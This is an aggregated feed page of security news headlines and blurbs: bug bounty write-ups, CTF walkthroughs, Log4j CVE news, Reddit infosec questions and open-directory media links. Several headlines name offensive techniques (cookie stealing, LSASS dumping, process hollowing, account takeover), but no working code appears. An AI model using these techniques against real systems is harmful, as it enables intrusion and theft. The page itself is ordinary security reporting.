    Hey infosec Geeks ✌,  ( 2 min )
    HacktoberFest2k21 vulnerability: How users metadata can be changed via Auth JWT tokens leaking from…
    Hello Awesome readers 👨‍💻✌✌,  ( 3 min )
    Cookie Stealing via Clickjacking using Burp collaborator
    Hello 👋 infosec geeks 👨‍💻 this is my 4th blog post,  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾,  ( 3 min )
    CTF Write-Up: Kryptonite
    CTF challenge available at ctf-mystiko.com.  ( 5 min )
  • Open

    Read-only user can edit user segments.
    Mail.ru disclosed a bug submitted by astates: https://hackerone.com/reports/1277753
    DLL hijacking in Monero GUI for Windows 0.17.3.0 would allow an attacker to perform remote command execution
    Monero disclosed a bug submitted by fukuyama: https://hackerone.com/reports/1437942
    API- /
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/1354452
    Change project visibility to a restricted option
    GitLab disclosed a bug submitted by s4nderdevelopment: https://hackerone.com/reports/1086781 - Bounty: $1370
  • Open

    Windows Privilege Escalation: Kernel Exploit
    As this series is dedicated to Windows privilege escalation, I’m writing this post to explain command practice for kernel-mode exploitation. The post Windows Privilege Escalation: Kernel Exploit appeared first on Hacking Articles.  ( 5 min )
  • Open

    Here’s How I Could Read Anyone’s Iphone Metrics Remotely.
    Hello, My name is Faizan. I’m a security researcher. Hope you like this blog. If you’ve any questions please feel free to reach out . Continue reading on Medium »  ( 2 min )
    TryHackMe Writeup : Solar, exploiting Log4J
    Hi there, Continue reading on Medium »  ( 6 min )
    Javascript 101 - Embedding objects & Arrays — 03
    Before reading this, you can look at Javascript 101 — Arithmetic Operators, Code Editors, Functions, Objects, and Arrays — 02. Continue reading on Medium »  ( 3 min )
    Caduceus Bug Bounty Challenge
    Caduceus has just entered its public testing phase and is launching this hackathon to identify bugs. Continue reading on Medium »  ( 2 min )
    Bitswift Unlimited Mint Bugfix Postmortem
    Summary Continue reading on Immunefi »  ( 4 min )
    The Password Bypass Leads to Full-Account-Takeover
    Hola Hackers, I’m Saransh Saraf aka MR23R0 Continue reading on Medium »  ( 1 min )
  • Open

    [Cellebrite Physical Analyzer] Basic usage question, easily resuming a session/case with multiple extractions
    Just started working with this program. I understand how to open and browse extractions, but I can't figure out if there's a better way to pick up where I left off after closing the program, I end up having to open/import all the extractions one by one again. For most programs that I'm familiar with, a "case" contains one or more extractions that I imported and "opening a case" tends to be a convenient way to bring up all the extractions in one "click". However, based on how little experience I have with PA, "opening a case" seems to just be a prompt to import extractions all over again. I thought about using "project sessions", but it seems to be something that you open after all the extractions are open that remembers what analysis you've done, not necessarily what devices you were working on. Can anyone speak to this? Am I oblivious to a basic function that lets me easily open all the extractions I had open? Maybe I'm supposed to create a portable case (UFDX?) or something? submitted by /u/PieWithIceCreamCrust [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2021-12-30 Review
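    ZN600 Telecom Optical Modem Analysis: First Look by ourren Rich-Text Security Filtering Scheme for Developers by ourren Tenda AX12 Router Device Analysis (Part 2): The UPnP Protocol by ourren A Tool for Finding JSP Webshells via Taint Tracking by ourren A Tool Implementation for Quickly Probing a Target Firewall's Outbound Ports by ourren Let's Talk About Configuration File RCE by ourren Scanner Performance Analysis Case Study by ourren Kernel-Mode eBPF Programs for Container Escape and a Hidden-Account Rootkit by ourren Software Supply Chain Security Development Insight Report (2021) by ourren For more recent articles, visit SecWiki  ( 2 min )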
  • Open

    I wrote a replacement for Pyrasite to inject code into Python processes on Kubernetes
    submitted by /u/nyellin [link] [comments]  ( 1 min )
    Bootkit samples
    submitted by /u/hardenedvault [link] [comments]
  • Open

    TryHackMe | CTF | Walkthrough | Raven
    Checkout this virtual machine on TryHackMe. LogIn on TryHackMe, go to rooms → raven1he. Link: https://tryhackme.com/room/raven1he Continue reading on Medium »  ( 3 min )
  • Open

    Upgrade your OSINT investigations with Maltego
    What is Maltego anyway? Continue reading on Medium »  ( 1 min )
    OSINT — Sakura (TryHackMe walktrough)
    The OSINT Dojo recently found themselves the victim of a cyber attack. It seems that there is no major damage, and there does not appear… Continue reading on Medium »  ( 2 min )
  • Open

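    FreeBuf Morning Report | WeChat Mini Programs Need Authorization to Access Personal Information; Amazon Alexa Voice Assistant Oversteps
    Starting February 21, 2022, mini programs must obtain user authorization to access Bluetooth and contacts or to add calendar events.  ( 1 min )
    Threat Hunting Architecture and Practice | A First Look at CIS 2021 Spring Edition Conference Topics
    Threat hunting is currently recognized in the industry as one of the most effective proactive security solutions, and it can minimize the harm that cyberattacks cause to enterprises.  ( 1 min )
    T-Mobile: User Data Breach Caused by SIM Swapping Attacks
    US telecom carrier T-Mobile suffered a data breach in which an unknown number of customers were hit by SIM swapping attacks.
    Building DevSecOps: The White-Box Sequel
    Exploring a tool that can both meet an enterprise's internal automated audit needs and help white hats quickly find vulnerabilities in day-to-day work.  ( 4 min )
    IoT Honeypots Reveal the Network Threats Facing IoT Devices
    Honeypots have traditionally been used as decoy devices to help researchers better understand the dynamics of threats on the network and their impact.  ( 1 min )
    Over 1,200 Websites Use MitM Phishing Toolkits That Let Cybercriminals Bypass 2FA Authentication
    Man-in-the-middle phishing toolkits are real-time phishing toolkits that require no human operation, because everything is done automatically through a reverse proxy.  ( 1 min )
    Summary and Analysis of ThinkPHP5 Deserialization Exploit Chains
    This article summarizes and analyzes the deserialization exploit chains in ThinkPHP 5.0 and 5.1, partly for future reference and partly as an in-depth study of PHP deserialization.  ( 6 min )
    Incident Response: Trojan Detection with Yara Rules
    Yara is a rule-based malware sample analysis tool that helps security researchers and blue teams analyze malware, and custom detection rules can be written during incident response and forensics to detect malware.  ( 1 min )
    Multiple Serious Security Vulnerabilities Disclosed in Subway Security Gates
    These vulnerabilities could allow remote attackers to bypass authentication requirements, tamper with metal detector configurations, and even execute arbitrary code on the devices.  ( 1 min )
    Hidden Interfaces of Major Automakers Keep Leaking: How Should We Inventory Company Assets?
    How large enterprises on the client side ("Party A") carry out an asset inventory
    "2021 Enterprise Security Operations Practice Report" Released: From Passive Defense to Taking the Initiative
    Moving from passive to proactive, enterprise security operations have firmly seized the initiative.  ( 1 min )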

  • Open

    Why haven't African countries invested much in the Cybersecurity Industry?
    Most of the African countries don't know what Cybersecurity is! Some know it but they have not yet faced a serious risk! This is the main reason why countries like Uganda don't embrace Cybersecurity and Technology at large and this causes a serious threat to a country shortly because technology is becoming unavoidable! submitted by /u/Cyber_Catalyzer [link] [comments]  ( 1 min )
    Question about java deobfuscation HTB module
    Hi all, I am doing the "Javascript deObfuscation" module on the hackthebox platform (very very nice!). I read this: "As previously mentioned, the above-used method of obfuscation is packing. Another way of unpacking such code is to find the return value at the end and use console.log to print it instead of executing it." Can anyone explain this to me? Possibly with an example? Thank you submitted by /u/g-simon [link] [comments]  ( 1 min )
    Nessus says IPMI hashes are disclosed, but metasploit's ipmi_dumphashes returns nothing?
    I see this fairly frequently during pentests where Nessus raises an issue about IPMI Hash Disclosure, but of course doesn't show any hashes. When using ipmi_dumphashes I get nothing in response. Does anyone know any other utilities to check for IPMI hash disclosure and confirm if Nessus is giving me a false positive? submitted by /u/security_intern [link] [comments]  ( 1 min )
    Someone is trying to access my accounts...what to do?
    I believe someone is in possession of my personal information and is trying to access my accounts. Over the last few days I have been prompted to confirm my identity in Venmo and Paypal. I also just received notice that someone is trying to access my Twitter account in Ecuador. I have changed my Google password and all of my financial passwords. I have not detected any fraudulent activity on any of my cards, but am at a loss what to do next. Should I simply change every password I have? Is there a better course of action? The only way I can think they may have gotten my information is that I pirate tv shows on my personal computer. It recently blue screened and I had to wipe everything. Pretty much at a loss for what to do at this step as it seems someone is attempting to access my account, but at this point hasn't been able to bypass 2fa or basic security questions. submitted by /u/LechronJames [link] [comments]  ( 2 min )
    Looking for advice and recommendations for RMM software.
    We're dealing with sensitive and juicy data, protected by strict regulations, in an environment where we could be targeted for being a little start up with access to some very interesting things. I'm of two minds. . . On the one hand, just the presence of RMM is a potential vuln (especially giving some cloud service admin access to my devices). On the other hand, I want to be able to keep track of stuff (and audit my users, who are scattered around the country, at least quarterly). I need an RMM solution for MacOS and Windows both that has a good track record and (hopefully) a reasonably open audit history. I'd feel more comfortable with something where I can host my own server, not have it call home somewhere in the cloud (I realise that's probably a nonstarter, at least as far as MacOS is concerned). I was moderately excited about Tactical RMM, but after what just happened with them, I'm a "hell no!" on that one. Any thoughts on this? submitted by /u/thebardingreen [link] [comments]  ( 1 min )
    Best password manager?
    Hey security folks, help me out to choose the best password manager. Let me know which password manager you are using and why? What's the best password manager between 1password vs dashlane vs bitWarden? submitted by /u/noob_bug_hunter [link] [comments]  ( 4 min )
  • Open

    PrintNightmare and SSH Tunnels
    submitted by /u/m_edmondson [link] [comments]
    Flagpro malware is threatening enterprises and is backed by Chinese hackers
    submitted by /u/Gengar-boy [link] [comments]  ( 1 min )
    How I built the PoC for the Log4j zero-day security vulnerability
    submitted by /u/melbadry9 [link] [comments]
  • Open

    open directories containing music (4)
    01 - Original Sound Track Tokusatsus - ddl.tokusatsu-fansub.fr > Musiques > Tokusatsus Collection MP3 OST e BGM > 01 - Original Sound Track Tokusatsus Index of /criticalmasscatania/data/media (inventati.org) Index of /mp3 (pinballnirvana.com) Index of /tunes (syer.net) Index of /Music Index of /ftp/MP3 (bahiabeachtenerife.com) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (3)
    http://wrobradio.com/mp3s/ http://www.crypthome.com/members/Belle/vwavvv/ http://www.ibiblio.org/pha/dawk/Audio/ http://www.crescentmoon.club/All%20Music/ http://files.sfenyc.com/Music/?C=M;O=A http://woodrosepsp.com/judy/MUSIC/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (2)
    http://www.captainspud.com/stuff/music/ http://cvltnation.com/wp-content/audio/ https://anorg.chem.uu.nl/people/staff/FrankdeGroot/woXS/ https://dl.msbmusic.ir/d1/1398/Music/09/ http://tka4.org/tka4/articles/Music%20Listening/sound/ https://www.iutbayonne.univ-pau.fr/~lopis/BBand/Divers/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (1)
    https://www.acroche2.com/mid_jazz/ http://148.72.150.188/archive/access/audio/ http://91.121.145.85/panel/136/henk/Blue%20Note%20The%20Ultimate%20Jazz%20Collection/Blue%20Note%20-%20The%20Ultimate%20Jazz%20Collection%20-%20CD1/ http://pix.klunch.com:555/mp3/ http://www.doctorwhofanshop.com/mov/ https://ia801002.us.archive.org/27/items/tntvillage_381703/John%20Coltrane%20-%20Legacy%20%28Impulse%21%29%20%281955-67%29%20%28Disc%201%20-%20Harmonic%20%26%20Melodic%29/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    ARCHIVES OF INTERNET RADIO SHOWS. Music and interviews seemingly. Might be easier to check parent directory first.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Various operating system ISOs
    submitted by /u/Plastic_Preparation1 [link] [comments]
    An Audiobook for every novel in the Nero Wolfe detective series by Rex Stout
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Music. Hmm. Some of it is the original artists at least in the first directory. The rest seems to be covers and maybe original material by some french band. There is a trio mentioned in parent folder. But in open directory folders which have people's names, there are more than 3 folders. Whew.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    classical music in some of the directories.
    submitted by /u/International_Milk_1 [link] [comments]
    Telegram bot-OD downloader
    I am thinking of creating a telegram bot that crawls and downloads OD, is that already done? Is it a good idea? And could I be legally accused with anything? submitted by /u/_NullPointerEx [link] [comments]  ( 3 min )
  • Open

    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guys are doing well. Here is the story of how I am able to crash anyone’s Mozilla Firefox by just sending a single email… Continue reading on Medium »  ( 1 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi, Continue reading on Medium »  ( 1 min )
    Jet Protocol Upgrade Bug Patch Disclosure
    On Dec 21st, we performed an ad hoc upgrade to our mainnet program that introduced a critical vulnerability that was quickly discovered… Continue reading on Jet Protocol »  ( 1 min )
    How To Hack Any Website
    [PART -3 Exploiting Trust] Continue reading on System Weakness »  ( 12 min )
    LENOVO OPEN REDIRECTION
    Hello Hackers!! Continue reading on Medium »  ( 1 min )
    OTP bypass via response manipulation
    Hello everyone I’m Jan Jeffrie Salloman, I started bug hunting 1 year ago. This writeup is about an OTP bypass using response manipulation… Continue reading on Medium »  ( 1 min )
    Polygon Lack Of Balance Check Bugfix Postmortem — $2.2m Bounty
    Whitehat Leon Spacewalker reported a critical vulnerability in Polygon on December 3. Continue reading on Immunefi »  ( 4 min )
  • Open

    Log4j CVE-202144228
    Krisp disclosed a bug submitted by karthik86: https://hackerone.com/reports/1431624
    SQL Injection leads to retrieve the contents of an entire database.
    BlockDev Sp. Z o.o disclosed a bug submitted by u-itachi: https://hackerone.com/reports/1002641
  • Open

    Help with installing Autopsy
    submitted by /u/UserNo007 [link] [comments]  ( 1 min )
    Forensic Analysis of USB tripwire that shreds your LUKS Header
    submitted by /u/maltfield [link] [comments]  ( 1 min )
    Tips on GCFA (SANS FOR508) certification
    Hello everyone, I've just registered for GCFA (SANS FOR508). What are the major tips that anyone can share for this certification? One piece of feedback that I heard from my colleagues who took it a couple of months back was that the practice papers don't have much similarity to the actual exam. Which is kind of a concern as I have a GCIH (SANS SEC504) and my practice papers were very similar to the actual exam. Appreciate any feedback from anyone who has recently attempted the certification, thanks! submitted by /u/Writtensine6 [link] [comments]  ( 3 min )
  • Open

    SecWiki News 2021-12-29 Review
    Business Security Development Insight Report 2021 by ourren Consumer IoT Security Baseline by ourren For more recent articles, visit SecWiki  ( 2 min )
  • Open

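    Raspberry Pi Special Issue: Setting Up a Kali Environment
    Pick up that Raspberry Pi gathering dust and do something meaningful with it! This is for beginners who want to learn information security at low cost, so let's get going together!  ( 1 min )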
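    FreeBuf Morning Report | Online Password Manager LastPass Hit by Large-Scale Credential Stuffing; Court Rules Haogou App Infringed Privacy Rights
    Global news: 1. Log4j 2.17.1 is now released, fixing a new remote code execution bug. Apache has released Log4j version 2.17.1, which fixes a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832. [Foreign press - read the original] 2. Haogou App read users' phone clipboard contents without permission, and a court ruled it infringed privacy rights. While using the Haogou App, phone user Xiao Lin (a pseudonym) discovered that, without consent, the app was monitoring and collecting their phone's clip  ( 1 min )
    "Information Security Technology: Technical Requirements for Cryptographic Application Design of Information Systems" (Draft for Comment) Released
    The draft for comment offers recommendations on techniques for designing cryptographic application schemes for information systems, providing guidance and reference for that design work.
    Data Loss Prevention Market to Reach USD 6.265 Billion by 2026
    By 2026, the data loss prevention market will reach USD 6.265 billion.  ( 1 min )
    Risky Streaming Apps Appear in Samsung's App Store, Posing Security Risks and Involving Infringement
    These apps masquerade as ShowBox, a pirated movie and TV application that has ceased operation, and have already triggered Play Protect security warnings on multiple users' devices.
    A Collection of 48 Questions on Classified Protection 2.0 and Commercial Cryptography Application Products (Part 2)
    In the era of Classified Protection 2.0, in line with the development and application of information technology and the cybersecurity situation, the system's scope has been continually enriched, its coverage extended and its supervisory measures improved, gradually completing the policies, standards and supporting framework of the cybersecurity classified protection system.  ( 1 min )
    In the Cloud Migration Era, Here Is How Enterprises Can Do Cloud Security Audits!
    In the era of moving to the cloud, enterprises should define cloud security audit check items based on their own security and compliance requirements and the characteristics of public clouds, and make effective use of public cloud configuration audit services to raise the level of audit automation in the cloud.  ( 1 min )
    Major Release | [2021 China White Hat Survey Report] Officially Published
    In the future, white hats should try their hand more at vulnerability areas they have not known well or been good at, and refresh their bug-hunting knowledge and skills.  ( 1 min )
    Analysis of the Principles Behind the Domain Privilege Escalation Vulnerabilities CVE-2021-42287 and CVE-2021-42278
    In summary, this vulnerability, initially called nopac, is really an attack aimed at cross-domain scenarios and has little practical significance.  ( 3 min )
    Online Password Manager LastPass Hit by Large-Scale Credential Stuffing
    Online password manager LastPass has acknowledged that attackers carried out a large-scale credential stuffing attack against its users in an attempt to access their cloud-hosted password vaults.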
  • Open

    BountyHunter HackTheBox Walkthrough
    Bounty hunter is a CTF Linux machine with an Easy difficulty rating on the Hack the Box platform. So let’s get started and take a The post BountyHunter HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Log4jscanner: A Log4j vulnerability filesystem scanner and Go package
    Article URL: https://github.com/google/log4jscanner Comments URL: https://news.ycombinator.com/item?id=29723953 Points: 3 # Comments: 0  ( 3 min )
  • Open

    CTF Write-Up: Shiftpocalypse
    CTF challenge available at ctf-mystiko.com.  ( 3 min )
    CTF Write-Up: Hell Yeah!
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    Story of a weird CSRF bug
    Heyyy Everyoneeee,  ( 5 min )
    Forensics — Memory Analysis with Volatility
    Recently, I’ve been learning more about memory forensics and the volatility memory analysis tool. To get some more practice, I decided to…  ( 6 min )
    Log4Shell Simplified : All you need to know about CVE-2021-44228
    Collection of all the required details to understand Log4shell (CVE-2021–44228 ) vulnerability  ( 4 min )
    TryHackme — Introduction to Django
    CTF  ( 2 min )
    Bug Bounty Tool List
    Bug Bounty Tool List Which are useful for Hunting  ( 1 min )
  • Open

    Implant.ARM.iLOBleed.a | Padvish Threats Database
    submitted by /u/dmchell [link] [comments]
  • Open

    OSINT Cheatsheet: A Mindmap for Your Investigation
    This is a guest post by Steve Hall (https://twitter.com/shall_1) Continue reading on Medium »

  • Open

    Red & Blue-Team Quick Reference Gitbooks
    Hi everyone! I would like to share with you one of my gitbooks, focused on DFIR, Malware and Blue-Team in general. It is a WIP in progress. I'm actually adding more and more things while I learn along the way. 📘 Hunter - Jorge Testa There you have my Red-Team version. WIP too. 📕 Tryharder - Jorge Testa Hope you like it! submitted by /u/J-Testa [link] [comments]  ( 1 min )
    Microsoft Defender for Identity security alert lateral movement playbook
    submitted by /u/dmchell [link] [comments]
  • Open

    Third Log4j RCE Vulnerability Discovered in Apache Logging Library [With Technical details & PoC]
    submitted by /u/Gorkha56 [link] [comments]
    DFIR or AppSec?
    Hi everyone, I'm currently a Computer Science student and I would love to work in cybersecurity. There are 2 roads that I want to explore and I was wondering if you could help me decide which career path to choose as I really like both of them equally: Start as a SOC Analyst and specialize in DFIR Work for a couple of years as a software engineer, after that transition to AppSec Thank you and really looking forward to your answers! submitted by /u/cyberprime24 [link] [comments]  ( 1 min )
    Most comprehensive(or better in another way) list of default creds?
    I can see there are a lot of sites that list default creds, but they seem to be missing a lot like default setting web apps. Usually it doesn't take too long to google, but not always. What are your favorite lists for this? Is it better to just google each time or have you found any gems out there? submitted by /u/Euphorinaut [link] [comments]  ( 1 min )
    "Pentesting" a friends web app, it's a bit scary..
    Hey everyone! First of all I'm not a pentester, I'd like to be one one day but for now I remain a noob who is trying harder every day. Now that thats out of the way let me start.. So I met up with a friend of mine recently who had an idea for a web app and hired a company to develop it. It's still in development but the other day he showed me the progress and asked me for my general opinion on the idea, status of the website and since he also receives regular backups of the code, he asked me to take a quick look at it. It seemed to be built on top of WordPress, nothing fancy but since I'm interested in Pentesting and Web application security I took a quick glance at interesting files like login, etc... Now again, I'm not a web dev or have great skills in php or js but I can read some o…  ( 5 min )
    Has anyone ever read Kevin Mitnick’s The Art of Invisibility? How useful was the advice?
    It’s a book released in 2017 that details how to secure your OPSEC. A lot of 5 star reviews on amazon, can anyone summarize the chapters? There were 16. submitted by /u/Original_Ad_1103 [link] [comments]  ( 3 min )
    In what fields of InfoSec is there potential for entrepreneurship?
    I am currently a high school student passionate about InfoSec studying Network+ material, and as someone who wants to own a business one day I was interested in which specific areas of this field there is startup potential. Of course, I plan on gaining plenty of experience in jobs before contributing my own innovation so your answers will allow me to calibrate my learning/career path to be more effective for my goals. submitted by /u/Connect_Estate_8617 [link] [comments]  ( 4 min )
  • Open

    New Log4j2 vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-44832 Comments URL: https://news.ycombinator.com/item?id=29718845 Points: 97 # Comments: 41  ( 3 min )
    Important: Security Vulnerability CVE-2021-44832
    Article URL: https://logging.apache.org/log4j/2.x/ Comments URL: https://news.ycombinator.com/item?id=29718814 Points: 2 # Comments: 0  ( 5 min )
    Log4j Vulnerability Scanning Tool from Jfrog
    Article URL: https://github.com/jfrog/log4j-tools Comments URL: https://news.ycombinator.com/item?id=29715230 Points: 1 # Comments: 0  ( 6 min )
  • Open

    Intercepting Google CSE resources: automate Google searches with client-side generated URIs (for…
    Introduction Continue reading on Medium »  ( 11 min )
  • Open

    New Log4j CVE - CVE-2021-44832. Another JNDI RCE. Fixed in latest release.
    submitted by /u/emmainvincible [link] [comments]  ( 1 min )
    Turning bad SSRF to good SSRF: Websphere Portal
    submitted by /u/Mempodipper [link] [comments]
    IRIS - A web collaborative platform for incident response analysts allowing to share investigations at a technical level
    submitted by /u/Maijin [link] [comments]
    Pet surveillance with Falco
    submitted by /u/MiguelHzBz [link] [comments]
    Using laser speckle patterns to see keypresses etc.
    submitted by /u/anfractuosus [link] [comments]  ( 1 min )
    Integrating Canary Tokens with Microsoft Sentinel SIEM
    submitted by /u/m_rothe [link] [comments]
    PHP LFI with Nginx Assistance
    submitted by /u/dL2Hj4wR [link] [comments]  ( 1 min )
    V8 Heap pwn and /dev/memes - WebOS Root LPE
    submitted by /u/DavidBuchanan [link] [comments]
    Encoding.Tools (alternative to CyberChef and Burp Suite Encoder)
    submitted by /u/mehaase [link] [comments]
  • Open

    Hack Us Will You?
    Delorians, Continue reading on Medium »  ( 1 min )
    Astroport Boosts Bug Bounty to $3m, Takes Top Leaderboard Spot
    Astroport has just doubled its critical bug bounty reward from $1.5m to $3m, making it the largest bounty on Immunefi’s platform, beating… Continue reading on Immunefi »  ( 1 min )
    Hunting for Bugs in File Upload Feature:
    In this blog, I will be listing down some file upload Vulnerability such RCE, SSRF, CSRF, XSS and many more such vulnerabilities. Continue reading on Medium »  ( 4 min )
    SSRF in Align Technology, Inc.
    Hi everyone Align Technology, Inc. is a manufacturer of 3D digital scanners and the Invisalign clear aligners used in orthodontics.It is… Continue reading on Medium »  ( 1 min )
    [Campaign] — HappyLand testnet invitation!
    HappyLand Testnet will arrive at the end of December and we are super thrilled to welcome you. This is an opportunity to let you imagine… Continue reading on Medium »  ( 2 min )
    Bypassing HttpOnly with phpinfo file
    While doing Web Application assessment with Higgsx, We found stored Cross-Site Scripting(XSS) which was a nice finding but we could not… Continue reading on Medium »  ( 1 min )
    CVE-2021–38314 Leads to Sensitive Information Disclosure
    Hello Hackers! Continue reading on Medium »  ( 1 min )
    How having a student mail can help you in Info-sec.
    Hello Everyone, I’m Vishal & It’s my first ever blog . So if you found any grammatical error or something missing don’t pardon me, Instead… Continue reading on Medium »  ( 5 min )
    Bounty Evaluation GitHub = $15,000 US Dollars | Rate Limit
    I found the bug on GitHub website where, I bypassed the login authentication. In this walk through I will show it was done. Let’s… Continue reading on Medium »  ( 2 min )
    Bug Report Update!
    We are very grateful for the overwhelming support our community has shown for our ongoing testnet & bugbounty programme. Our bugbounty… Continue reading on Medium »  ( 2 min )
    Bug Bounty Programs for Blockchain Projects
    The list of methods and strategies applied by hackers to compromise the security of their targets is constantly expanding and they… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2021-12-28 Review
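    Series: Evolving Advanced Threat Governance (Part 4) by ourren Series: Evolving Advanced Threat Governance (Part 3) by ourren Series: Evolving Advanced Threat Governance (Part 2) by ourren Series: Evolving Advanced Threat Governance (Part 1) by ourren SecWiki Weekly (Issue 408) by ourren Transparency vs. National Security? Calls to Reform the US VEP Policy Rise Again by ourren Vulnerability Disclosure Is a Wicked Problem: A Brief Overview of Coordinated Vulnerability Disclosure (CVD) by ourren THINE: Representation Learning for Temporal Heterogeneous Information Networks by ourren For more recent articles, visit SecWiki  ( 2 min )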
  • Open

    Dell Driver EoP (CVE-2021-21551)
    submitted by /u/nanabingies [link] [comments]
  • Open

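    [Security Advisory] Auerswald COMpact 5500R PBX Firmware: Multiple Backdoor Vuln...
    Recently, RedTeam Pentesting disclosed multiple backdoor vulnerabilities in the Auerswald COMpact 5500R PBX firmware. Through these backdoors, attackers can...  ( 1 min )
    [Security Advisory] Apache APISIX Dashboard Authentication Bypass Vulnerability (C...
    Recently, an authentication bypass vulnerability in Apache APISIX Dashboard surfaced online. Through this vulnerability, attackers can bypass the authentication process and, via...  ( 1 min )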
  • Open

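    A Preview of the Closed Beta of HFish, a Free Enterprise-Grade Chinese-Made Honeypot
    I was lucky enough to get closed-beta access from a member of the HFish product team, so I am sharing my personal experience using it along with some deployment approaches. There is an Easter egg at the end.  ( 1 min )
    Goodbye Script Kiddie Series | Java Security (1): Java Local and Remote Debugging Techniques
    The first course series mainly covers topics related to Java security.  ( 1 min )
    [Original] VulnHub Target Machine Hands-On: CyNix: 1
    VulnHub Target Machine Hands-On: CyNix: 1  ( 1 min )
    World's Largest Photo Service Company Hit by Ransomware; Pirated Copies of New Spider-Man Film Contain Cryptomining Trojan | Global Cybersecurity Highlights for December 28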
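    Albanian Prime Minister Apologizes for Data Leak
    After the personal data of hundreds of thousands of Albanian citizens was leaked on the internet, Albania's prime minister publicly apologized for the incident.
    Apache HTTP Server 2.4.52 Released, Fixing Critical Vulnerabilities
    Users and administrators are advised to review the Apache announcement and update their versions as soon as possible to avoid unnecessary potential attacks.  ( 1 min )
    FreeBuf Morning Report | Nearly 70% of Internet Users Feel Manipulated by Algorithms; Albanian Prime Minister Apologizes for Data Leak
    The "Chinese Public 'Big Security' Perception Report" released by Peking University's Internet Development Research Center shows that nearly 70% of the public say they worry about their accounts and personal information being leaked.  ( 1 min )
    QNAP NAS Devices Hit by Ransomware Attacks over Christmas
    The eCh0raix ransomware attackers all appear to have created an account in the system administrators group in order to encrypt all files on the NAS system.  ( 1 min )
    Logistics Giant DW Morgan Exposed 100 GB of Customer Data
    The Website Planet security team found a misconfigured Amazon S3 bucket containing about 2.5 million files totaling more than 100 GB.  ( 1 min )
    Shutterfly, the World's Largest Photo Service Company, Hit by Conti Ransomware Attack
    Shutterfly was founded in 1999 and claims its online photo storage is the world's largest, holding 70 PB of data and about 1.6 billion images.  ( 1 min )
    Anti-Cracking for Unity Games: Code Cracking and Asset Theft, Starting from the Attack Risks
    This article focuses on "anti-cracking", describing these security risks and how to upgrade Unity games with comprehensive, matrix-style protection.  ( 1 min )
    Swagger Injection Attacks on API Definition Files
    Developers should treat API definition files as untrusted input and add corresponding security controls to the automated code generation stage.  ( 1 min )
    Security Requirements Analysis of 5G SMF and UPF Network Elements Based on free5gc + UERANSIM
    This article analyzes, at the packet and code level, the SMF and UPF network element security requirements defined in the 3GPP Security Assurance Specification (SCAS).  ( 6 min )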
  • Open

    Looking back at 2021 in cybersecurity with Netsparker
    As 2021 draws to a close, it is time for our customary round-up of the year’s most popular and relevant posts on the Netsparker blog, with a sprinkling of last-minute news and predictions for the coming year. READ MORE  ( 4 min )
  • Open

    How I Bypassed Netflix Profile Lock?
    Hi hackers,  ( 3 min )
    Analysis of Poetrat malware
    Hashes  ( 3 min )
    TryHackme LFI Writeup
    How to find and exploit LFI  ( 3 min )
    How I hacked into one of India’s biggest online book stores(RCE and more)
    This article is going to be about how I found my 1st RCE on one of India’s biggest e-commerce sites(+ a few more bugs).  ( 5 min )
  • Open

    google drive movie link
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    186 persiangig OD Sites Potential NSFW

  • Open

    Windows resolves/"connects" to external IP even without internet access?
    I was poking around in my router the other day and found something I can't really understand: my Windows machine tried to connect to an external IP address (13.?.?.?) when there was no internet access and no DNS. My modem's internet cable was disconnected and both modem and router were rebooted before I powered up the Windows machine. All DNS caches should be empty. The router connections page shows 1 connection from my Windows machine to 13.?.?.? with status SYN_SENT. Of course, it didn't connect, but how did it know what external IP to try without DNS? The IP is a Microsoft one but I didn't write down what it was (and I didn't save search history) since I initially didn't think it was strange. I tried repeating the same thing several times, but never saw anymore external IPs (but a bunch of 198.x.x.x which is what I'd expect when internet is down). The only difference the first time is that it was installing a previously downloaded Windows update. Is this unusual? Is MS known to go directly to IP addresses like this? This machine only has Windows installed and drivers from Windows Update, so not much on here. submitted by /u/Vivid-Elk-8337 [link] [comments]  ( 2 min )
    Linux servers security
    Hi, We have 100+ Linux servers running with apache/tomcat and Nginx, and a few servers are public-facing with ip control. I am trying to see if any open source tool to scan all 100+ servers on a daily basis and report if any vulnerabilities. Thanks. submitted by /u/Prestigious-Yam-3510 [link] [comments]  ( 1 min )
    Best IT backgrounds to prepare for InfoSec
    I am currently a computer science student and I want to pursue a career in cybersecurity but I know that in order to get into security I will need some kind of experience before I can get a job in the field. I'm just wondering what are the best IT backgrounds to have or things that I should focus on that would help me develop skills needed for security careers. I know it depends on what kind of focus I want in security and for now I'm thinking more towards the defensive side like engineer maybe but I would prefer having answers based in either roles (attack and defense). So to rephrase it a bit better I wanna know what are the best temporary jobs that I could do to develop skills needed to switch into security (soft dev, web dev, data sci, etc...)? submitted by /u/iTsObserv [link] [comments]  ( 7 min )
  • Open

    Playing around COM objects - PART 1
    submitted by /u/dmchell [link] [comments]
    Dumping LSASS with Duplicated Handles
    submitted by /u/dmchell [link] [comments]
    snovvcrash/NimHollow: Nim implementation of Process Hollowing using syscalls (PoC)
    submitted by /u/dmchell [link] [comments]
  • Open

    Winning the Impossible Race – An Unintended Solution for Includer’s Revenge / Counter (hxp 2021)
    submitted by /u/Caustic66 [link] [comments]
    remote Chaos Computer Congress Streaming
    submitted by /u/mubix [link] [comments]
    A Deep Dive into DoubleFeature: Equation Group's Post-Exploitation Dashboard
    submitted by /u/Megabeets [link] [comments]
  • Open

